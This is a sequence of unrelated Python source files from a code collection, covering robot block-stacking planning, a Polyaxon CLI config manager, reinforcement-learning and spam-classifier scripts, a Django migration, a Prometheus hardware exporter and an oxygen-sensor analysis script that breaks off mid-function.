        # Define block order by sorting by height
        current_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
        block_ixs = range(len(self.pddl_blocks))
        block_ixs = sorted(block_ixs, key=lambda ix: current_poses[ix][0][2], reverse=True)
        # Build the initial data structures
        if self.use_planning_server:
            from stacking_ros.msg import BodyInfo
            from stacking_ros.srv import SetPlanningStateRequest
            from tamp.ros_utils import block_init_to_ros, pose_to_ros, pose_tuple_to_ros, transform_to_ros
            ros_req = SetPlanningStateRequest()
            ros_req.init_state = block_init_to_ros(self.pddl_blocks)
            if self.real:
                ros_req.robot_config.angles = self.real_arm.convertToList(self.real_arm.joint_angles())
            else:
                ros_req.robot_config.angles = self.robot.arm.GetJointValues()
        else:
            pddl_problems = []
        # Add all blocks to be moved to the data structure
        for ix in block_ixs:
            blk, pose = self.pddl_blocks[ix], self.original_poses[ix]
            if blk in self.moved_blocks:
                if self.use_planning_server:
                    goal_pose = pb_robot.vobj.BodyPose(blk, pose)
                    block_ros = BodyInfo()
                    block_ros.name = blk.readableName
                    block_ros.stack = False
                    pose_to_ros(goal_pose, block_ros.pose)
                    ros_req.goal_state.append(block_ros)
                else:
                    pddl_problems.append((self.table, blk, pose))
        # Return the planning data structure
        if self.use_planning_server:
            return ros_req
        else:
            return pddl_problems
def simulate_tower(self, tower, vis, T=2500, real=False, base_xy=(0., 0.5), ignore_resets=False):
"""
Simulates a tower stacking and unstacking by requesting plans from a separate planning server
Returns:
success : Flag indicating success of execution (True/False)
stable : Flag indicating (0 or 1)
num_stack_success : Number of blocks successfully stacked
"""
for block in tower:
print('Block:', block.name)
print('Pose:', block.pose)
print('Dims:', block.dimensions)
print('CoM:', block.com)
print('Rotations:', block.rotation)
print('-----')
if self.use_vision:
self._update_block_poses()
self.original_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
planning_prob = self.build_planning_problem(tower, base_xy)
# Execute the stacking plan
success, stack_stable, reset_stable, num_success, fatal = \
self.plan_and_execute(planning_prob, real, T, stack=True, ignore_resets=ignore_resets)
print(f"Completed tower stack with success: {success}, stable: {stack_stable}")
if reset_stable:
print(f"Completed tower reset stable: {reset_stable}")
# If we have a nonfatal failure, replan from new state, removing successful goals
while (not success and not fatal):
print(f"Got recoverable failure. Replanning from step index {num_success}.")
if self.use_planning_server:
from tamp.ros_utils import block_init_to_ros
if self.real:
planning_prob.robot_config.angles = self.real_arm.convertToList(self.real_arm.joint_angles())
else:
planning_prob.robot_config.angles = self.robot.arm.GetJointValues()
planning_prob.init_state = block_init_to_ros(self.pddl_blocks)
if isinstance(self.last_obj_held, pb_robot.vobj.BodyGrasp):
planning_prob.held_block.name = self.last_obj_held.body.readableName
transform_to_ros(self.last_obj_held.grasp_objF, planning_prob.held_block.pose)
success, stack_stable, reset_stable, num_success, fatal = \
self.plan_and_execute(planning_prob, real, T, stack=True, start_idx=num_success, ignore_resets=ignore_resets)
print(f"Completed tower stack with success: {success}, stable: {stack_stable}")
if reset_stable:
print(f"Completed tower reset stable: {reset_stable}")
# Write the number of successfully stacked blocks
num_stack_success = min(len(tower), num_success)
# If the full tower did not succeed, reset the moved blocks
if not ignore_resets:
try:
if not (stack_stable and reset_stable):
if self.use_vision and not stack_stable:
self._update_block_poses(find_moved=True)
# TODO: Return arm to home position to help with vision.
planning_prob = self.build_reset_problem()
reset_fatal = False
num_reset_success = 0
while len(self.moved_blocks) > 0 and not reset_fatal:
print(f"Resetting {len(self.moved_blocks)} blocks.")
reset_success, _, reset_stable, num_reset_success, reset_fatal = \
self.plan_and_execute(planning_prob, real, T, stack=False, start_idx=num_reset_success)
except Exception as e:
print("Planning/execution failed during tower reset.")
print(e)
# Return the final planning state
return success, stack_stable, num_stack_success
def plan_and_execute(self, planning_prob, real=False, T=2500, stack=True, start_idx=0, ignore_resets=False):
    """
    Requests a PDDLStream plan from a planning server and executes the resulting plan
    Returns:
        success : Flag for whether the plan execution succeeded
        stack_stable : Flag for whether stacking a stable tower was successful
        reset_stable : Flag for whether resetting a tower was successful
        num_success : Progress (in number of steps) of successful tasks
        fatal : Flag for whether the error was fatal (True) or recoverable (False)
        start_idx : Start index of planning (for recovering from partial plans)
        ignore_resets : Flag for whether to stop after resets
    """
    # Initialize variables
    num_success = start_idx
    stack_stable = False
    reset_stable = False
    # NOTE(review): planning_active is never reassigned below; the wait loop
    # exits only via a valid plan or a server-side failure response.
    planning_active = True
    if self.use_planning_server:
        # Send a reset request to the planning server
        ros_req = planning_prob
        num_steps = len(ros_req.goal_state)
        # Only send the not-yet-completed goals (resume after partial plans).
        trimmed_ros_req = deepcopy(ros_req)
        trimmed_ros_req.goal_state = trimmed_ros_req.goal_state[start_idx:]
        self.init_state_client.call(trimmed_ros_req)
    else:
        pddl_problems = planning_prob
        num_steps = len(pddl_problems)
    while num_success < num_steps:
        try:
            # PLANNING
            # If using planning server, request a plan from the server using ROS
            if self.use_planning_server:
                query_block = self.pddl_block_lookup[ros_req.goal_state[num_success].name]
                # Wait for a valid plan
                plan = []
                saved_world = pb_robot.utils.WorldSaver()
                while len(plan) == 0 and planning_active:
                    time.sleep(5)
                    print("Getting a plan from server...")
                    ros_resp = self.get_plan_client.call()
                    if not ros_resp.planning_active:
                        print("Planning failed on server side.")
                        # If failure happened during stacking, it is a fatal failure
                        if (ros_req.goal_state[num_success].stack):
                            print(f"Failed during stacking {query_block}")
                            fatal = True
                        # If failure happened during resetting, prompt user to manually reset blocks
                        else:
                            print(f"Failed during resetting {query_block}")
                            input("Manually reset the blocks and press Enter to continue")
                            if real:
                                self._update_block_poses()
                            fatal = False
                        return False, stack_stable, reset_stable, num_success, fatal
                    if self.validate_ros_plan(ros_resp, query_block):
                        plan = self.ros_to_task_plan(ros_resp, self.execution_robot, self.pddl_block_lookup)
            # Otherwise, plan locally
            else:
                base, blk, pose = pddl_problems[num_success]
                query_block = blk
                self._add_text('Planning block placement')
                self.plan()
                saved_world = pb_robot.utils.WorldSaver()
                self.robot.arm.hand.Open()
                # Unpack initial conditions
                fixed_objs = self.fixed + [b for b in self.pddl_blocks if b != blk]
                init = self._get_initial_pddl_state()
                goal_terms = []
                if base == self.table:
                    blk_pose = pb_robot.vobj.BodyPose(blk, pose)
                    # During the reset half of the task (or non-stacking runs),
                    # allow alternate orientations via the "AtHome" goal.
                    if (not stack or num_success >= num_steps/2) and self.alternate_orientations:
                        init += [("Reset",)]
                        goal_terms.append(("AtHome", blk))
                    else:
                        init += [('Pose', blk, blk_pose),
                                 ('Supported', blk, blk_pose, self.table, self.table_pose)]
                        goal_terms.append(('AtPose', blk, blk_pose))
                        goal_terms.append(('On', blk, self.table))
                else:
                    init += [('RelPose', blk, base, pose)]
                    goal_terms.append(('On', blk, base))
                goal = tuple(['and'] + goal_terms)
                # Plan with PDDLStream
                pddl_info = get_pddlstream_info(self.robot,
                                                fixed_objs,
                                                self.pddl_blocks,
                                                add_slanted_grasps=True,
                                                approach_frame='global',
                                                use_vision=self.use_vision,
                                                home_pose=pose)
                plan, cost = pddlstream_plan(pddl_info, init, goal,
                                             search_sample_ratio=1.0,
                                             max_time=INF)
                if plan is None:
                    print("\nFailed to plan\n")
                    fatal = False
                    return False, stack_stable, reset_stable, num_success, fatal
            # Undo any state changes made during planning before executing.
            saved_world.restore()
            print("\nGot plan:")
            print(plan)
            # Once we have a plan, execute it
            obstacles = [f for f in self.fixed if f is not None]
            if not self.use_planning_server:
                self.plan()
                ExecuteActions(plan, real=False, pause=False, wait=False, obstacles=obstacles)
            self.execute()
            ExecuteActions(plan, real=real, pause=True, wait=False, prompt=False, obstacles=obstacles,
                           sim_fatal_failure_prob=0.0, sim_recoverable_failure_prob=0.0)
            # Manage the moved blocks (add to the set when stacking, remove when unstacking)
            desired_pose = query_block.get_base_link_pose()
            if query_block not in self.moved_blocks:
                self.moved_blocks.add(query_block)
            else:
                self.moved_blocks.remove(query_block)
            # Check stability
            if not real:
                self.step_simulation(T, vis_frames=False)
            #input('Press enter to check stability.')
            if stack:
                stable = self.check_stability(real, query_block, desired_pose)
            else:
                stable = True  # Don't care about stability on reset
            if stable == 0.:
                # Allow a human override of the automated stability check.
                prompt = input('Tower NOT stable. Is this true? [y: Unstable / n: Stable]')
                if prompt == 'n':
                    stable = 1.
            #input('Continue?')
            # Manage the success status of the plan
            if stable == 0.:
                print("Unstable after execution!")
                return True, stack_stable, reset_stable, num_success, False
            else:
                num_success += 1
                # The first half of the goal steps is stacking, the rest resets.
                if stack and num_success == num_steps/2:
                    print("Completed tower stack!")
                    stack_stable = True
                    stack = False
                    if ignore_resets:
                        return True, stack_stable, reset_stable, num_success, False
                elif num_success == num_steps:
                    print("Completed tower reset!")
                    reset_stable = True
                    return True, stack_stable, reset_stable, num_success, False
        except ExecutionFailure as e:
            print("Planning/execution failed.")
            print(e)
            saved_world.restore()
            if real:
                self._update_block_poses()
                self.robot.arm.SetJointValues(self.real_arm.convertToList(self.real_arm.joint_angles()))
            self.last_obj_held = e.obj_held
            return False, stack_stable, reset_stable, num_success, e.fatal
def check_stability(self, real, block_pddl, desired_pose, max_tries=2):
    """Check whether a block ended up (close to) where we wanted it.

    Args:
        real: Whether we are on the physical robot (affects thresholds used
            via the vision path only when self.use_vision is set).
        block_pddl: Block body; must expose readableName (vision path) or
            get_base_link_point() (simulation path).
        desired_pose: (position, orientation-quaternion) target pose.
        max_tries: Unused; kept for interface compatibility.

    Returns:
        1. if the block is considered stable/in place, 0. otherwise.
    """
    if self.use_vision:
        # Get pose of blocks using wrist camera.
        try:
            poses = self._get_block_poses_wrist().poses
        except Exception:
            # Fix: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit; narrowed to Exception.
            print('Service call to get block poses failed during check stability. Exiting.')
            sys.exit()
        # Check if pose is close to desired_pose.
        visible = False
        for named_pose in poses:
            if named_pose.block_id in block_pddl.readableName.split('_')[-1]:
                visible = True
                pose = named_pose.pose.pose
                des_pos = desired_pose[0]
                obs_pos = (pose.position.x, pose.position.y, pose.position.z)
                print('[Check Stability] Desired Pos:', des_pos)
                print('[Check Stability] Detected Pos:', obs_pos)
                # First check if the pose is too far away.
                dist = numpy.linalg.norm(numpy.array(obs_pos)-numpy.array(des_pos))
                print(f'[Check Stability] Position Distance (>0.04): {dist}')
                if dist > 0.04:
                    return 0.
                # Also check that the block is flat on the table.
                orn = desired_pose[1]
                obs_orn = pyquaternion.Quaternion(pose.orientation.w, pose.orientation.x, pose.orientation.y, pose.orientation.z)
                des_orn = pyquaternion.Quaternion(orn[3], orn[0], orn[1], orn[2])
                angle = (des_orn.inverse*obs_orn).angle
                angle = numpy.abs(numpy.rad2deg(angle))
                print(f'[Check Stability] Orientation Distance (> 15): {angle}')
                if angle > 15:
                    return 0.
        # If block isn't visible, return 0.
        if not visible:
            print('[Check Stability] Object not visible to camera.')
            return 0.
    else:
        # Simulation path: only a position check with a tighter threshold.
        end_pose = block_pddl.get_base_link_point()
        dist = numpy.linalg.norm(numpy.array(end_pose) - numpy.array(desired_pose[0]))
        if dist > 0.01:
            print('Unstable!')
            return 0.
    return 1.
def validate_ros_plan(self, ros_resp, tgt_block):
    """Check that a ROS plan (if any) picks the block we expect to move."""
    # An empty plan trivially validates.
    if len(ros_resp.plan) == 0:
        return True
    # The first "pick" action identifies which block the plan manipulates.
    picked = [step.obj1 for step in ros_resp.plan if step.type == "pick"]
    if not picked:
        return False
    plan_block = picked[0]
    print(f"Received plan to move {plan_block} and expected to move {tgt_block}")
    return tgt_block.readableName == plan_block
def robot_state_callback(self, msg):
    """Inspect robot state errors and raise ExecutionFailure on fatal arm faults."""
    now = time.time()
    # Rate-limit how often the error flags are inspected.
    if (now - self.arm_last_error_time) < self.arm_error_check_time:
        return
    self.arm_last_error_time = now
    errs = msg.current_errors
    # Each of these conditions is unrecoverable for the current plan.
    fatal_conditions = (
        (errs.communication_constraints_violation,
         "Communication constraints violation detected!"),
        (errs.joint_position_limits_violation,
         "Joint position limits violation detected!"),
        (errs.joint_motion_generator_position_limits_violation,
         "Joint motion generator position limits violation detected!"),
    )
    for triggered, reason in fatal_conditions:
        if triggered:
            raise ExecutionFailure(reason=reason, fatal=True)
def learning_server_callback(self, ros_req, base_xy=(0.5, -0.3)):
    """ Service callback function to plan and execute a tower from active learning script """
    # Deferred imports so ROS message types are only required when serving.
    from stacking_ros.srv import PlanTowerResponse
    from tamp.ros_utils import ros_to_tower
    tower = ros_to_tower(ros_req.tower_info)
    # Second positional arg presumably toggles visualization (cf. the `vis`
    # parameter of PandaClientAgent.simulate_tower) — TODO confirm.
    success, stable, num_stack_stable = self.simulate_tower(
        tower, True, real=self.real, base_xy=base_xy)
    resp = PlanTowerResponse()
    resp.success = success
    resp.stable = stable
    resp.num_stack_stable = num_stack_stable
    return resp
def step_simulation(self, T, vis_frames=False, lifeTime=0.1):
    """Advance both the execution and planning pybullet worlds by T steps.

    The arm joints are re-pinned to their current configuration on every
    step, so only free bodies (the blocks) move under gravity.
    """
    p.setGravity(0, 0, -10, physicsClientId=self._execution_client_id)
    p.setGravity(0, 0, -10, physicsClientId=self._planning_client_id)
    q = self.robot.get_joint_positions()
    for _ in range(T):
        p.stepSimulation(physicsClientId=self._execution_client_id)
        p.stepSimulation(physicsClientId=self._planning_client_id)
        # Re-assert the arm configuration in both worlds each step.
        self.execute()
        self.execution_robot.set_joint_positions(self.robot.joints, q)
        self.plan()
        self.robot.set_joint_positions(self.robot.joints, q)
        time.sleep(1/2400.)
        if vis_frames:
            # Draw short-lived XYZ axes on every block in the execution world.
            length = 0.1
            for pddl_block in self.pddl_blocks:
                pos, quat = pddl_block.get_pose()
                new_x = transformation([length, 0.0, 0.0], pos, quat)
                new_y = transformation([0.0, length, 0.0], pos, quat)
                new_z = transformation([0.0, 0.0, length], pos, quat)
                p.addUserDebugLine(pos, new_x, [1,0,0], lineWidth=3, lifeTime=lifeTime, physicsClientId=self._execution_client_id)
                p.addUserDebugLine(pos, new_y, [0,1,0], lineWidth=3, lifeTime=lifeTime, physicsClientId=self._execution_client_id)
                p.addUserDebugLine(pos, new_z, [0,0,1], lineWidth=3, lifeTime=lifeTime, physicsClientId=self._execution_client_id)
def simulate_action(self, action, block_ix, T=50, vis_sim=False, vis_placement=False):
    """
    Perform the given action to with the given block. An observation
    should be returned in the reference frame of the platform.
    :param action: Place action which describes the relative pose of the block to the platform surface.
    :param real_block: Belief representation of the block to perform the action on.
    :param T: How many timesteps to simulate the block falling for.
    :param vis_sim: Ununsed.
    :return: (action, T, end_pose) End pose should be TODO: what frame?
    TODO: Not sure if this method works at the moment...
    """
    assert(self.platform_table is not None)
    real_block = self.belief_blocks[block_ix]
    pddl_block = self.pddl_blocks[block_ix]
    original_pose = pddl_block.get_base_link_pose()
    # Set up the PDDLStream problem for the placing the given block on the
    # platform with the specified action.
    self.pddl_info = get_pddlstream_info(self.robot,
                                         self.fixed,
                                         self.pddl_blocks,
                                         add_slanted_grasps=False,
                                         approach_frame='gripper',
                                         use_vision=self.use_vision)
    init = self._get_initial_pddl_state()
    # Figure out the correct transformation matrix based on the action.
    real_block.set_pose(Pose(ZERO_POS, Quaternion(*action.rot.as_quat())))
    rotated_block = get_rotated_block(real_block)
    x = action.pos[0]
    y = action.pos[1]
    # Rest the block on top of the platform surface.
    z = self.platform_table.get_dimensions()[2]/2. + rotated_block.dimensions[2]/2 #+ 1e-5
    tform = numpy.array([[1., 0., 0., x],
                         [0., 1., 0., y],
                         [0., 0., 1., z],
                         [0., 0., 0., 1.]])
    tform[0:3, 0:3] = action.rot.as_matrix()
    # Code to visualize where the block will be placed.
    if vis_placement:
        surface_tform = pb_robot.geometry.tform_from_pose(self.platform_table.get_base_link_pose())
        body_tform = surface_tform@tform
        length, lifeTime = 0.2, 0.0
        pos, quat = pb_robot.geometry.pose_from_tform(body_tform)
        new_x = transformation([length, 0.0, 0.0], pos, quat)
        new_y = transformation([0.0, length, 0.0], pos, quat)
        new_z = transformation([0.0, 0.0, length], pos, quat)
        p.addUserDebugLine(pos, new_x, [1,0,0], lifeTime=lifeTime)
        p.addUserDebugLine(pos, new_y, [0,1,0], lifeTime=lifeTime)
        p.addUserDebugLine(pos, new_z, [0,0,1], lifeTime=lifeTime)
    init += [('RelPose', pddl_block, self.platform_table, tform)]
    goal = ('On', pddl_block, self.platform_table)
    # Solve the PDDLStream problem.
    print('Init:', init)
    print('Goal:', goal)
    # NOTE(review): this call signature (init, goal, ...) does not match the
    # plan_and_execute defined above — confirm whether this path is still used.
    self.plan_and_execute(init, goal, search_sample_ratio=1000)
    # Execute the action.
    # TODO: Check gravity compensation in the arm.
    self.step_simulation(T)
    end_pose = self._get_observed_pose(pddl_block, action)
    observation = (action, T, end_pose)
    self.step_simulation(500-T)
    # Put block back in original position.
    # TODO: Check if block is on the table or platform to start.
    self.pddl_info = get_pddlstream_info(self.robot,
                                         self.fixed,
                                         self.pddl_blocks,
                                         add_slanted_grasps=True,
                                         approach_frame='gripper',
                                         use_vision=self.use_vision)
    init = self._get_initial_pddl_state()
    goal_pose = pb_robot.vobj.BodyPose(pddl_block, original_pose)
    init += [('Pose', pddl_block, goal_pose),
             ('Supported', pddl_block, goal_pose, self.table, self.table_pose)]
    goal = ('and', ('AtPose', pddl_block, goal_pose),
            ('On', pddl_block, self.table))
    # Solve the PDDLStream problem.
    print('Init:', init)
    print('Goal:', goal)
    success = self.plan_and_execute(init, goal, max_time=100., search_sample_ratio=1000)
    return observation
class PandaClientAgent:
    """
    Lightweight client to call a PandaAgent as a service for active learning
    """

    def __init__(self):
        # Deferred import: rospy is only needed when actually running as a client.
        import rospy
        rospy.init_node("panda_client")
        self.restart_services()

    def restart_services(self):
        # (Re)connect the ROS service proxy used for tower planning.
        import rospy
        from stacking_ros.srv import PlanTower
        print("Waiting for Panda Agent server...")
        rospy.wait_for_service("/plan_tower")
        print("Done")
        self.client = rospy.ServiceProxy(
            "/plan_tower", PlanTower)

    def simulate_tower(self, tower, vis, real=False):
        """
        Call the PandaAgent server's `simulate_tower` method to plan and execute a tower.
        Returns:
            success : Flag indicating success of execution (True/False)
            stable : Flag indicating (0 or 1)
            num_stack_success : Number of blocks successfully stacked
        """
        from stacking_ros.srv import PlanTowerRequest
        from tamp.ros_utils import tower_to_ros, ros_to_tower
        request = PlanTowerRequest()
        request.tower_info = tower_to_ros(tower)
        if vis:
            # Show the requested tower locally while the server executes it.
            w = World(tower)
            env = Environment([w], vis_sim=True, vis_frames=True)
            env.step(vis_frames=True)
        for b in tower:
            print('----- Block info -----')
            print(b.name)
            print(b.dimensions)
            print(b.pose)
            print(b.rotation)
        # Blocks until the server finishes planning/executing the tower.
        response = self.client.call(request)
        if vis:
            env.disconnect()
        return response.success, response.stable, response.num_stack_stable
|
5,151 | 41c44b32ce3329cbba5b9b336c4266bb20de31f0 | import shelve
def quantity_posts(path='data'):
    """Print every key/value pair stored in the shelve database at *path*.

    Args:
        path: Filename of the shelve database. Defaults to the original
            hard-coded 'data' for backward compatibility.
    """
    try:
        data = shelve.open(path)
    except Exception as exc:
        # Fix: the original printed the Exception *class* (no `as` binding);
        # print the actual error instance instead.
        print(exc)
        # Fix: the original's `finally: data.close()` raised NameError when
        # opening failed, because `data` was never bound.
        return
    try:
        for key, value in sorted(data.items()):
            print(key, ': \t', value, '\n')
    finally:
        data.close()
if __name__ == "__main__":
    # Simple CLI entry point: dump the contents of the local 'data' shelve.
    print('begin')
    quantity_posts()
    print('end')
|
5,152 | fd391d28d76b0c1b3cf6d0b5134390ab3f1267fb | #!/usr/bin/python
#
# Copyright 2018-2020 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_config import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
    """Manages access cli configuration .cli file."""

    VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL
    CONFIG_FILE_NAME = ".cli"
    CONFIG = CliConfigurationConfig
    # Version checks are only forced every FREQUENCY invocations.
    FREQUENCY = 3

    @classmethod
    def _get_count(cls):
        """Return the incremented invocation counter (not persisted here)."""
        config = cls.get_config_or_default()
        return config.check_count + 1

    @classmethod
    def reset(
        cls,
        check_count=None,
        current_version=None,
        server_versions=None,
        log_handler=None,
    ):
        """Update any provided fields of the persisted CLI config.

        Returns the updated config, or None when nothing was provided.
        NOTE(review): `any([...])` treats a falsy check_count (0) as
        "not provided" — pre-existing behavior, kept as-is.
        """
        if not any([check_count, current_version, server_versions, log_handler]):
            return
        cli_config = cls.get_config_or_default()
        if check_count is not None:
            cli_config.check_count = check_count
        if current_version is not None:
            cli_config.current_version = current_version
        if server_versions is not None:
            cli_config.server_versions = server_versions
        if log_handler is not None:
            cli_config.log_handler = log_handler
        # Fix: use cls instead of hard-coding CliConfigManager so a subclass
        # persists through its own configuration class.
        cls.set_config(config=cli_config)
        return cli_config

    @classmethod
    def should_check(cls):
        """Return True when a server version check is due."""
        count = cls._get_count()
        cls.reset(check_count=count)
        if count > cls.FREQUENCY:
            return True
        config = cls.get_config_or_default()
        if config.current_version is None or config.min_version is None:
            return True
        return LooseVersion(config.current_version) < LooseVersion(config.min_version)
|
5,153 | f49a133fa94aae791ef0f1eec54cf0629f45a0ed | # -*- coding: UTF-8 -*-
'''
model = DQN,DDQN,PDQN,PDDQN,DQN_PER,DDQN_PER,DQN_InAday,DQN_PER_Ipm...
'''
# -----------ContolGame------------
# CartPole - v1, MountainCar - v0, Acrobot - v1, Pendulum - v0
# from run_ContolGame import run_Game
# run_Game('DQN', 'CartPole-v1', episodes=400) # model,env,episodes
# -----------AtariGame - ------------
from run_AtariGame import run_Game
# Train DQN with prioritized experience replay on Breakout (5 lives, 40001 episodes).
run_Game('DQN_PER', 'Breakout', lifes=5, episodes=40001)  # model,env,lifes,episodes
|
5,154 | f5820824b5b7e473b79b5dfee2f203684c3755be | # -*- coding: utf-8 -*-
import pandas as pd
import matplotlib.pyplot as plt
from tqdm import tqdm
from scipy.io import loadmat
from mpl_toolkits.mplot3d import axes3d
import matplotlib.pyplot as plt
import numpy as np
import copy
from matplotlib import cm
from matplotlib.animation import FuncAnimation
import scipy.optimize
import networkx as nx
from sklearn import svm
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
# task 13
# Load the spamTrain.mat training data and spamTest.mat test data from file.
train_data = loadmat('data/spamTrain.mat')
x = train_data["X"]  # feature matrix: one row per message, one-hot over the vocab
y = train_data["y"]  # labels
test_data = loadmat('data/spamTest.mat')
x_test = test_data["Xtest"]
y_test = test_data["ytest"]
def vector_to_message(vector, vocab_path="data/vocab.txt"):
    """Reconstruct the words of a message from its one-hot vocabulary vector.

    Args:
        vector: Iterable of 0/1 flags aligned with the lines of the vocab file.
        vocab_path: Path to the vocabulary file; each line is "<index> <word>".
            Defaults to the original hard-coded path.

    Returns:
        The present words joined by single spaces, in vocabulary order.
    """
    # Fix: use a context manager so the vocab file handle is always closed
    # (the original opened it and never closed it).
    with open(vocab_path, "r") as vocab_file:
        vocab = vocab_file.readlines()
    message_words = []
    for vocab_record, vector_enterance in zip(vocab, vector):
        if vector_enterance:
            message_words.append(vocab_record.split()[1])
    return " ".join(message_words)
# Decode the first test message vector back into its words.
message = vector_to_message(x_test[0])
def one_hot_convert(message, vocab_path="data/vocab.txt"):
    """Convert a message string into a 1 x |vocab| one-hot numpy array.

    Args:
        message: Whitespace-separated message text.
        vocab_path: Path to the vocabulary file; each line is "<index> <word>".
            Defaults to the original hard-coded path.

    Returns:
        numpy array of shape (1, vocab_size) with 1 where the word occurs.
    """
    message_words = message.split()
    message_words.sort()
    # Fix: use a context manager so the vocab file handle is always closed
    # (the original opened it and never closed it); also dropped a stray `pass`.
    with open(vocab_path, "r") as vocab_file:
        vocab = vocab_file.readlines()
    one_hot = []
    for record in vocab:
        word = record.split()[1]
        one_hot.append(int(word in message_words))
    return np.array([one_hot])
# Fix: the original called one_hot_convert() with no arguments, which raises
# TypeError; convert the decoded test message instead.
one_hot_convert(message)
5,155 | 156203042ed8a9bde0e9d8587ea3d37de6bcfdf7 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter line_A/line_B/line_C on 'subtitles' to CharField(max_length=255, default=None)."""

    dependencies = [
        ('sub_adjuster', '0002_parameters'),
    ]

    operations = [
        # All three subtitle line fields receive the same altered definition.
        migrations.AlterField(
            model_name='subtitles',
            name='line_A',
            field=models.CharField(max_length=255, default=None),
        ),
        migrations.AlterField(
            model_name='subtitles',
            name='line_B',
            field=models.CharField(max_length=255, default=None),
        ),
        migrations.AlterField(
            model_name='subtitles',
            name='line_C',
            field=models.CharField(max_length=255, default=None),
        ),
    ]
|
5,156 | 527d514cbad0916fecfe0da68de04d3b130d94c7 | import re
from prometheus_client.core import GaugeMetricFamily
class ArrayHardwareMetrics:
    """Collects Pure FlashArray hardware health metrics for Prometheus."""

    def __init__(self, fa):
        self.fa = fa
        self.chassis_health = None
        self.controller_health = None
        self.component_health = None
        # Fix: 'temperature' was assigned twice in the original, while
        # 'power' was never initialized here despite being used later.
        self.temperature = None
        self.power = None

    def _array_hardware_status(self):
        """Collect information about all system sensors."""
        data = self.fa.get_hardware_status()
        self.chassis_health = GaugeMetricFamily(
            'purefa_hardware_chassis_health',
            'FlashArray hardware chassis health status')
        self.controller_health = GaugeMetricFamily(
            'purefa_hardware_controller_health',
            'FlashArray hardware controller health status',
            labels=['controller'])
        self.component_health = GaugeMetricFamily(
            'purefa_hardware_component_health',
            'FlashArray hardware component health status',
            labels=['chassis', 'controller', 'component', 'index'])
        self.temperature = GaugeMetricFamily(
            'purefa_hardware_temperature_celsius',
            'FlashArray hardware temperature sensors',
            labels=['chassis', 'controller', 'sensor'])
        self.power = GaugeMetricFamily(
            'purefa_hardware_power_volts',
            'FlashArray hardware power supply voltage',
            labels=['chassis', 'power_supply'])

        re_chassis = re.compile(r"^CH(\d+)$")
        re_controller = re.compile(r"^CT(\d+)$")
        re_component = re.compile(r"^(CH|CT)(\d+)\.([A-Z]+)([0-9]+)$")

        for comp in data:
            if comp['status'] == 'not_installed':
                continue
            component_name = comp['name']
            component_state = 1 if (comp['status'] == 'ok') else 0
            # Fix: match each compiled pattern once instead of first testing
            # with an equivalent inline re.match() and then re-matching.
            chassis_match = re_chassis.match(component_name)
            if chassis_match:
                # Chassis, e.g. "CH0"
                self.chassis_health.add_metric([chassis_match.group(1)], component_state)
                continue
            controller_match = re_controller.match(component_name)
            if controller_match:
                # Controller, e.g. "CT1"
                self.controller_health.add_metric([controller_match.group(1)], component_state)
                continue
            component_match = re_component.match(component_name)
            if component_match:
                # Component, e.g. "CT0.TMP3" or "CH0.PWR1"
                c_base = component_match.group(1)
                c_base_index = component_match.group(2)
                c_type = component_match.group(3)
                c_index = component_match.group(4)
                if c_base == 'CH':
                    # Chassis-based component
                    labelset = [c_base_index, '', c_type, c_index]
                else:
                    # Controller-based component
                    labelset = ['', c_base_index, c_type, c_index]
                # Component health status
                self.component_health.add_metric(labels=labelset, value=component_state)
                if c_type.lower() == 'tmp':
                    # Additional metric for temperature
                    if c_base == 'CH':
                        self.temperature.add_metric(
                            [c_base_index, '', c_index], float(comp['temperature']))
                    else:
                        self.temperature.add_metric(
                            ['', c_base_index, c_index], float(comp['temperature']))
                elif c_type.lower() == 'pwr':
                    # Additional metric for voltage level
                    if comp['voltage'] is not None:
                        self.power.add_metric([c_base_index, c_index],
                                              float(comp['voltage']))

    def get_metrics(self):
        """Refresh and yield all hardware metric families."""
        self._array_hardware_status()
        yield self.chassis_health
        yield self.controller_health
        yield self.component_health
        yield self.temperature
        yield self.power
|
5,157 | 836e2fd6eca7453ab7a3da2ecb21705552b5f627 | import data
import numpy as np
import matplotlib.pyplot as plt
import xgboost as xgb
import pandas as pd
import csv
from matplotlib2tikz import save as tikz_save
import trial_sets
def print_stats(trial_id, dl):
    """Print reliability statistics for one trial's wrist vs. ground-truth oxygen data."""
    wrist_device, _, true_device = dl.load_oxygen(trial_id, iid=False)
    print("Length of Dataframe: " + str(data.get_df_length(wrist_device)))
    wrist_oxygen = wrist_device.values.flatten()
    true_oxygen = true_device.values.flatten()
    sample_count = wrist_oxygen.shape[0]
    # Samples the algorithm marked reliable are the non-NaN wrist readings.
    wrist_reliable_count = np.count_nonzero(~np.isnan(wrist_oxygen))
    print("Samples Collected: " + str(sample_count))
    algo_percent = (wrist_reliable_count / sample_count) * 100
    print("Algorithm marked {} samples, or {:.1f}%, as reliable".format(wrist_reliable_count, algo_percent))
    true_reliable_count = 0
    # Count samples whose wrist reading is within the loader threshold of truth
    # (NaN differences never satisfy <= and are correctly excluded).
    for o1, o2 in zip(wrist_oxygen, true_oxygen):
        difference = np.abs(np.subtract(o1, o2))
        if difference <= dl.threshold:
            true_reliable_count += 1
    actual_precent = (true_reliable_count / sample_count) * 100
    print("{}, or {:.1f}%, of labels were within {} of wrist sensor".format(true_reliable_count, actual_precent, dl.threshold))
    print("Positive Labels: " + str(true_reliable_count))
def visualize_classifier_results(training_ids, test_id, dl, show_classifier=True):
    """Plot wrist vs. true SpO2 for one trial, optionally overlaying classifier-cleaned data."""
    if show_classifier:
        X_train, y_train = dl.load(training_ids, iid=True)
        X_test, y_test = dl.load([test_id], iid=False)
        # Same tuned hyperparameters as used in create_error_cdf below.
        clf = xgb.XGBClassifier(
